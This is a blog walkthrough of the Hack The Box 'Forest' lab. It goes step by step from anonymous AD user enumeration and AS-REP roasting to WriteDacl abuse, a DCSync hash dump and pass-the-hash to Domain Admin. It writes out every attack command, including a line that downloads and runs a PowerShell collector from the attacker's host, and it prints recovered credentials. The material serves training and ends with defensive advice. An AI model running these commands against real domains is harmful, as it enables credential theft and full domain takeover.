Forest | Hack The Box Walkthrough | OSCP Style
From an AS-REP Roastable account to Domain Admin via BloodHound, ACL abuse (WriteDacl), and a DCSync attack.
From an AS-REP Roastable account to Domain Admin via BloodHound, ACL abuse (WriteDacl), and a DCSync attack.
Forest is one of the most instructive Active Directory machines on Hack The Box. It chains together a sequence of techniques that map almost one-to-one onto real-world domain compromises: enumerating users anonymously, AS-REP Roasting a service account, mapping attack paths with BloodHound, abusing Active Directory ACLs (WriteDacl) to escalate privileges, and finally performing a DCSync to dump every credential in the domain. Let’s work through it step by step.
Reconnaissance
We start with a full TCP scan that fingerprints services and runs the default NSE scripts:
nmap -p- --open -sS -sV -sC --min-rate 5000 -n 10.10.10.161 -oN result.txt

The service set is a textbook domain controller, and the domain htb.local is exposed throughout. With SMB and LDAP open, our first move is to enumerate domain users without credentials.
Anonymous User Enumeration
Forest allows anonymous (null-session) access, so we can list domain users without any credentials using CrackMapExec:
crackmapexec smb 10.10.10.161 -u '' -p '' --users

We save the resulting usernames into a users.txt file for the next step.
AS-REP Roasting
With a list of valid users, we test for AS-REP Roasting. This attack targets accounts that have the “Do not require Kerberos pre-authentication” flag set: for those accounts, the KDC will hand out an encrypted AS-REP message to anyone who asks, with no authentication required. That message is encrypted with the account’s password hash, so we can crack it offline. Impacket’s GetNPUsers performs the request:
sudo impacket-GetNPUsers htb.local/ -no-pass -usersfile users.txt

The account svc-alfresco is roastable, and we get its Kerberos AS-REP hash. We crack it with Hashcat using mode 18200 (Kerberos 5 AS-REP, etype 23) against rockyou.txt:
hashcat -a 0 -m 18200 hash.txt /usr/share/wordlists/rockyou.txt --force

Initial Foothold
Before connecting, we confirm the credentials are valid for WinRM with CrackMapExec:
crackmapexec winrm 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'

Since WinRM is available, we get an interactive PowerShell session with evil-winrm:
evil-winrm -i 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'

Mapping Attack Paths with BloodHound
Having a foothold in an AD environment, the smartest next step is to map relationships and privileges rather than guess. We use BloodHound, fed by the SharpHound collector. The PowerShell collector can be loaded directly into memory from our attacking machine:
IEX(New-Object Net[.]WebClient).downloadString('hxxp://10.10.14.3/SharpHound[.]ps1')
Invoke-BloodHound -CollectionMethod All




We then download the collected data back to Kali to import it into BloodHound:
download C:\Users\svc-alfresco\Desktop\20240315213625_BloodHound.zip data.zip

As an alternative, the compiled SharpHound[.]exe can be uploaded and run on the host directly:
wget hxxp://10.10.14.3/SharpHound[.]exe -O SharpHound[.]exe
.\SharpHound[.]exe -c all
![Figure 12. Transferring the compiled SharpHound[.]exe collector to the target.](https://cdn.academiaspg.com/blog/forest-hack-the-box-walkthrough-oscp-style/1_PaToFUBgbiXAvYB394oRnQ.png)
A practical tip: SharpHound and BloodHound versions must be compatible. In this case I had to use SharpHound v3.4 to match the BloodHound version I was running, a newer collector produced data the GUI refused to import. Always pair the collector to your BloodHound version.


Privilege Escalation
Importing the data into BloodHound reveals the path. svc-alfresco is a member of Account Operators (through nested group membership: Service Accounts → Privileged IT Accounts → Account Operators). The Account Operators group can create and manage user accounts and modify non-protected groups.

The key piece is that the Exchange Windows Permissions group holds WriteDacl rights over the domain object. WriteDacl lets a member rewrite the domain's access control list: including granting itself the replication rights needed for a DCSync attack. So our plan is: create a user, add it to Exchange Windows Permissions, then use that power to grant ourselves DCSync.
First, we use our Account Operators rights to create a new domain user:
net user crypto prueba123 /add /domain


Because the path runs through the Exchange Windows Permissions group’s WriteDacl, we add our new user to that group:


net group "Exchange Windows Permissions" crypto /add

DCSync Attack
Now that our user inherits WriteDacl over the domain, we use PowerView to grant that user DCSync rights. DCSync abuses the Directory Replication Service: it lets an account request password data from the domain controller as if it were another DC, effectively dumping any credential in the domain, including the Administrator's.
$pass = ConvertTo-SecureString 'abc123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\crypto', $pass)
Add-ObjectACL -PrincipalIdentity crypto -Credential $cred -Rights DCSync

With replication rights in place, we run Impacket’s secretsdump as our user to extract the NTDS secrets, including the Administrator NTLM hash:
impacket-secretsdump htb.local/crypto@10.10.10.161

Domain Compromise
We don’t need to crack the Administrator hash. We authenticate with it directly using Pass-the-Hash via psexec, landing a SYSTEM shell and capturing the root flag:
impacket-psexec administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6


Conclusion
Forest is a masterclass in Active Directory attack chaining. None of the individual steps relies on a software exploit. Every move abuses legitimate features and misconfigurations: anonymous enumeration, a service account without Kerberos pre-authentication, excessive group memberships, and a dangerous ACL that let a low-privileged user escalate all the way to a DCSync. BloodHound was the linchpin, turning a tangle of group memberships into a clear, exploitable path.
Key takeaways:
- Disable anonymous SMB/LDAP enumeration on domain controllers.
- Never leave “Do not require Kerberos pre-authentication” enabled. It invites AS-REP Roasting.
- Audit group memberships; nested membership in Account Operators is dangerous.
- Dangerous ACLs like WriteDacl over the domain object lead straight to DCSync and full compromise.
- BloodHound is as valuable to defenders as it is to attackers: run it on your own domain.
References
- AS-REP Roasting: The Hacker Recipes
- BloodHound Documentation
- Abusing Active Directory ACLs/ACEs
- DCSync: The Hacker Recipes
If you’re interested in following my upcoming articles on OT/ICS, certifications, HTB content, and Red Team experiences, I invite you to connect with me on LinkedIn or Instagram.